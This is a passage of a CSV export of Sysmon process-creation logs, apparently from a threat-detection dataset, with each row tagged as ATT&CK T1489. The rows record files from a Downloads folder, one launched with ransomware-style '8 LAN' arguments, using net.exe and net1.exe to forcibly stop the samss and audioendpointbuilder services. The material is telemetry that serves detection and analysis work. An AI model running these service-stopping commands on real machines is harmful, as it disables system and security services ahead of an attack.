/y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:01.912"",""processGuid"":""{df9fc3d3-1b09-5ec9-0000-001030572100}"",""processId"":""3320"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:46:03.376",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:01.627 +ProcessGuid: {df9fc3d3-1b09-5ec9-0000-001046522100} +ProcessId: 3920 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:01.635623200Z"",""eventRecordID"":""1714"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:01.627\r\nProcessGuid: {df9fc3d3-1b09-5ec9-0000-001046522100}\r\nProcessId: 3920\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:01.627"",""processGuid"":""{df9fc3d3-1b09-5ec9-0000-001046522100}"",""processId"":""3920"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:45:50.715",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:49.375 +ProcessGuid: {df9fc3d3-1afd-5ec9-0000-00106f1a1f00} +ProcessId: 191128 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1afd-5ec9-0000-0010d00f1f00} +ParentProcessId: 211964 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:49.399400300Z"",""eventRecordID"":""1713"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:49.375\r\nProcessGuid: {df9fc3d3-1afd-5ec9-0000-00106f1a1f00}\r\nProcessId: 191128\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1afd-5ec9-0000-0010d00f1f00}\r\nParentProcessId: 211964\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:49.375"",""processGuid"":""{df9fc3d3-1afd-5ec9-0000-00106f1a1f00}"",""processId"":""191128"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1afd-5ec9-0000-0010d00f1f00}"",""parentProcessId"":""211964"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:45:50.700",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:49.176 +ProcessGuid: {df9fc3d3-1afd-5ec9-0000-0010d00f1f00} +ProcessId: 211964 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:49.183538700Z"",""eventRecordID"":""1712"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:49.176\r\nProcessGuid: {df9fc3d3-1afd-5ec9-0000-0010d00f1f00}\r\nProcessId: 211964\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:49.176"",""processGuid"":""{df9fc3d3-1afd-5ec9-0000-0010d00f1f00}"",""processId"":""211964"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:45:50.685",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:49.114 +ProcessGuid: {df9fc3d3-1afd-5ec9-0000-0010ce0b1f00} +ProcessId: 211940 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1afc-5ec9-0000-001029031f00} +ParentProcessId: 211896 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:49.119469400Z"",""eventRecordID"":""1711"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:49.114\r\nProcessGuid: {df9fc3d3-1afd-5ec9-0000-0010ce0b1f00}\r\nProcessId: 211940\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1afc-5ec9-0000-001029031f00}\r\nParentProcessId: 211896\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:49.114"",""processGuid"":""{df9fc3d3-1afd-5ec9-0000-0010ce0b1f00}"",""processId"":""211940"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1afc-5ec9-0000-001029031f00}"",""parentProcessId"":""211896"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:45:50.658",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:48.948 +ProcessGuid: {df9fc3d3-1afc-5ec9-0000-001029031f00} +ProcessId: 211896 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:48.964626100Z"",""eventRecordID"":""1710"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:48.948\r\nProcessGuid: {df9fc3d3-1afc-5ec9-0000-001029031f00}\r\nProcessId: 211896\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:48.948"",""processGuid"":""{df9fc3d3-1afc-5ec9-0000-001029031f00}"",""processId"":""211896"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:45:41.028",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:39.609 +ProcessGuid: {df9fc3d3-1af3-5ec9-0000-0010802d1d00} +ProcessId: 207800 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1af3-5ec9-0000-0010bd261d00} +ParentProcessId: 207656 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:39.619371400Z"",""eventRecordID"":""1709"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:39.609\r\nProcessGuid: {df9fc3d3-1af3-5ec9-0000-0010802d1d00}\r\nProcessId: 207800\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1af3-5ec9-0000-0010bd261d00}\r\nParentProcessId: 207656\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:39.609"",""processGuid"":""{df9fc3d3-1af3-5ec9-0000-0010802d1d00}"",""processId"":""207800"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1af3-5ec9-0000-0010bd261d00}"",""parentProcessId"":""207656"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:45:41.014",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:39.500 +ProcessGuid: {df9fc3d3-1af3-5ec9-0000-0010bd261d00} +ProcessId: 207656 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 